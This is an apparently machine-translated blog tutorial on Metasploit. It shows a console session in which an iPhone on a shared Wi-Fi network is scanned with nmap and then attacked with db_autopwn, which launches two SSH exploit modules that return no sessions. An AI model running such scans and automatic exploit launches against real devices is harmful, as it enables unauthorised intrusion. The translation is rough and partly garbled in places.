Tutorial Metasploit

Metasploit exploit tool is one that is included in the backtrack, the following tutorial in exploiting the use metasploit backtrack system.scenarionya machine with 5 connected to the access point firmware 4.0.2 iphone via ssh wifi.Target actively connected via wifi to access the same pointroot@leak#msfconsole

   =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 697 exploits - 358 auxiliary - 54 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r12973 updated today (2011.06.18)

msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect -y /opt/framework3/config/database.yml
[*] Using database driver postgresql
 (catatan : db_connect mesti di set manual ke folder databasenya)

[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-06-19 21:14 CIT
[*] Nmap: Nmap scan report for 192.168.10.100
[*] Nmap: Host is up (0.0075s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 22/tcp    open  ssh
[*] Nmap: 62078/tcp open  iphone-sync
[*] Nmap: MAC Address: E8:06:88:7C:8D:89 (Apple )
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.22 seconds
(scanning dengan nmap,ada banyak opsi untuk scan dengan nmap,terlihat port 22 dan 62078 terbuka)
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -t -e -p
[*] Analysis completed in 20 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.10.100:22  exploit/windows/ssh/freeftpd_key_exchange  (port match)
[*]   192.168.10.100:22  exploit/windows/ssh/freesshd_key_exchange  (port match)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/ssh/freeftpd_key_exchange against 192.168.10.100:22...
[*] (2/2 [0 sessions]): Launching exploit/windows/ssh/freesshd_key_exchange against 192.168.10.100:22...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions

(db_autopwn msf3 used to use script automatically choose the appropriate exploits to target and open ports, from the above target for exploits is not vulnerable because there is no session is obtained)

sourece>> http://mangnik.blogspot.com/2011/08/tutorial-metasploit.html

with translate

Author : tuxbuntu

Share this

Related Posts